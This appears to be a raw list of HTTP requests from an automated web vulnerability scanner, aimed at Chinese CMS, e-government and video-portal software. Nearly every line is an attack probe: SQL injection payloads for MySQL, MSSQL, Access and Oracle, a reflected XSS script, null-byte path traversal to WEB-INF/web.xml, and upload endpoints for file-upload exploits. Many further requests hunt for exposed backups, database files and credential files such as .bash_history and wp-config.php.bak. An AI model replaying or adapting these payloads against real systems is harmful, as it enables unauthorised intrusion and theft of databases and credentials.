GET /cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
GET /cctrl/backup/index.php
GET /cctrl/admin/purview/purview.php
HEAD /data_Xbaby/gdjm133950.mdb
GET /admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
GET /admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
GET /admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
POST /admin/upfile.asp
POST /admin/upfile_yqhy.asp
GET /FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
GET /FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
GET /FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
GET /FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
POST /VIEWGOOD/ADI/portal/UserDataSync.aspx
POST /SPM/Pc/Content/Request.aspx?action=name_check
GET /VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
GET /adksvod/PublicFolder/AuthorVideo.aspx?AuthorID=-4448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /App_Site/SiteSearch.aspx?Title=1'%20AND%20(SELECT%20CHAR(58)%2bCHAR(85))%3E1%20--
GET /adksvod/PublicFolder/ShareVideoList.aspx?TagID=-1406%25%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29--%20
GET /adksvod/PublicFolder/VideoList.aspx?userid=1&TagID=101%25%27%20AND%202358%3DCONVERT%28INT%2C%28CHAR%2858%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%28112%29%2bCHAR%2858%29%2bCHAR%2886%29%2bCHAR%2858%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%28113%29%2bCHAR%2858%29%29%29%20--&type=catalog&level=3
GET /ismservice/jsp/billQueryPage.jsp?entercode=3%22%3C/script%3E%3Cscript%3Eprompt(42873);%3C/script%3E//
GET /admin/include/del.asp?tableName=feedback&pk=id&pkValue=IIF(iamnotfunction(),1,0)
POST /include/upload.asp
GET /TownsWeb/PageModule/MessageInfoList.aspx?MediaID=1'%20AND%201=CHAR(108)%20--
GET /TownsWeb/PageModule/MessageInfoSender.aspx?msgID=1'%20AND%201=CHAR(107)%20--
GET /Duty/write/FileType.aspx?hideBtn=1&ID=1'%20and%201=char(86)%20--
GET /WarnMaintence/AJaxHandler/UpdateSortNo.ashx?fnName=1&DeptCd=1&SortNo=(select%20char(86)%2bchar(95))
GET /WarnMaintence/SelectContacts.aspx?fnName=UpdateContact&selectedNodes=1&contactDeptCD=(select%20char(88)%2bchar(95))
GET /Warn/AjaxHandle/AjaxDeleteMsgInfo.ashx?action=DeleteMsg&msgid=(CONVERT(INT,(SELECT%20CHAR(99)%2bCHAR(86)%2bCHAR(94)%2bCHAR(101)%2bCHAR(93))))
GET /Map/AjaxHandler/AjaxMapCustomAction.ashx?action=GetParamVal&param=FaxUrl'%20and%202=(select%20char(118))%20--&dateForAjax=417
GET /products.asp
GET /App_Site/SiteTag.aspx?Tag=1'%20and%20char(106)=1%20--
GET /product_view.asp
HEAD /system/database/data.mdb
POST /fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=File&CurrentFolder=/
POST /manage/CHKLOGIN.ASP
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1%20and%201=(select%20char(96)%2bchar(98))&asid=321001
GET /Web/Interface/Pages/Frame_StudentBlog.aspx?i_rang=1&asid=1001%20and%201=(select%20char(76)%2bchar(98))
POST /search.asp
GET /onlineApply.do?method=initQlxm&depNo=321'%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Report/AjaxHandle/StationChoose/StationSearch.ashx?stationName=21')%20and%203=char(109)%20--&stationType='KKK','ZZ','PP','RR'&StationChooseType=Single&ReportID=Report16
HEAD /db1/%23kepu.mdb
POST /upfile.asp
POST /upfile2.asp
POST /upfile3.asp
HEAD /data/xinfang.mdb
GET /VIEWGOOD/WebMedia/search.aspx?key=0&searchCondition=1')%20AND%201=(SELECT%20CHAR(106))%20--&rnd=0.85
HEAD /gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00&gw_title=%00
GET /Duty/MailList/ContactUpdate.aspx?ReadOnly=&UnitID=1&ContactID=-1+and+1=(SELECT%20CHAR(106))
POST /WS/WebServiceBase.asmx/GetXMLList
POST /WS/WebService.asmx/GetFile
POST /WS/WebService.asmx/GetFileContent
GET /WS/WebService.asmx
POST /bos/desktop/ajax/EcAjax.aspx
GET /bos/desktop/RequestOrResponse.aspx?type=hits&isHits=Y&contentUid=%27%2b+(select+convert(int%2c(CHAR(106)%2bCHAR(79)))+FROM+syscolumns)+%2b%27
GET /Factory/AjaxGetCSDM.aspx?CSDM=TEST'%20AND%201=CHAR(106)%20--&a=1.1
GET /ldhyhd.do?theAction=edit_bzOne&id=1'%20UNION%20ALL%20SELECT%20NULL,CHR(113)%7C%7CCHR(120)%7C%7CCHR(105)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7CCHR(115)%7C%7CCHR(78)%7C%7CCHR(65)%7C%7CCHR(108)%7C%7CCHR(70)%7C%7CCHR(71)%7C%7CCHR(103)%7C%7CCHR(98)%7C%7CCHR(120)%7C%7CCHR(75)%7C%7CCHR(113)%7C%7CCHR(114)%7C%7CCHR(109)%7C%7CCHR(108)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
GET /model/twogradepage/listSend.aspx?appid=1%20AND%20CHAR(106)=1
POST /interface/ipsconnect/ipsconnect.php
GET /templates/
GET /service/local/outreach/welcome/nexusSpaces.css
GET /phpRedisAdmin/?overview
GET /?overview
GET /index.html#/dashboard/file/logstash.json
GET /
GET /index.php/weblinks-categories?id=just_test
POST /index.php/admin/?case=archive&act=respond&code=alipay&trade_status=WAIT_SELLER_SEND_GOODS
GET /index.php?m=Article&a=showByUname&uname=%2527or%25201%253D%2528select%25201%2520from%2520%2528select%2520count%2528%252a%2529%252Cconcat%2528floor%2528rand%25280%2529%252a2%2529%252C%2528select%2520md5%25281122%2529%2520from%2520fanwe_admin%2520limit%25200%252C1%2529%2529a%2520from%2520information_schema.tables%2520group%2520by%2520a%2529b%2529%2523
POST /FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media
GET /index.php?c=api&a=down&file=YWQ2OVpRcGJtL3d3NWh5WmVxbkNYbGRnZjVnalFLSXRaWkRpT1dVZmNXQ1BqNjhPeE82RkpKak1iWUZwcDZrK2tXaFZYdTRZ
GET /share.php?F_email=test@vul.org%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/test
GET /oxoxoxoxoxoxox.com
GET /oxoxoxoxoxoxox.com/
POST /api/xmlrpc
HEAD /wwwroot.rar
HEAD /wwwroot.zip
HEAD /wwwroot.tar.gz
HEAD /web.rar
HEAD /www.rar
HEAD /www.zip
HEAD /www.tar.gz
HEAD /web.zip
GET /crossdomain.xml
PUT /webscan_test.txt
GET /phpinfo.php
GET /info.php
GET /test.php
GET /shop.php?ac=view&shopid=1-cfreer
GET /wp-includes/registration-functions.php
GET /wp-includes/registration.php
GET /
GET /
GET /NOEXICT.php?A%27+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+concat(0x7e,md5(1122),0x7e)+from+user+limit+0,1)),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23
GET /pass.txt
GET /passwd
GET /password.txt
GET /passwords.txt
GET /users.txt
GET /users.ini
GET /admin.cfg
GET /install.log
GET /database.inc
GET /common.inc
GET /db.inc
GET /connect.inc
GET /conn.inc
GET /sql.inc
GET /.bash_history
GET /.bashrc
GET /Web.config
GET /Global.asax
GET /Global.asa
GET /Global.asax.cs
GET /data.mdb
GET /domcfg.nsf
GET /names.nsf
GET /log.nsf
GET /domlog.nsf
GET /.rediscli_history
GET /data/%23data.mdb
GET /config.inc.php.bak
GET /config/config_ucenter.php.bak
GET /config/config_global.php.bak
GET /uc_server/data/config.inc.php.bak
GET /data/common.inc.php.bak
GET /wp-config.php.bak
GET /WEB-INF/database.properties
GET /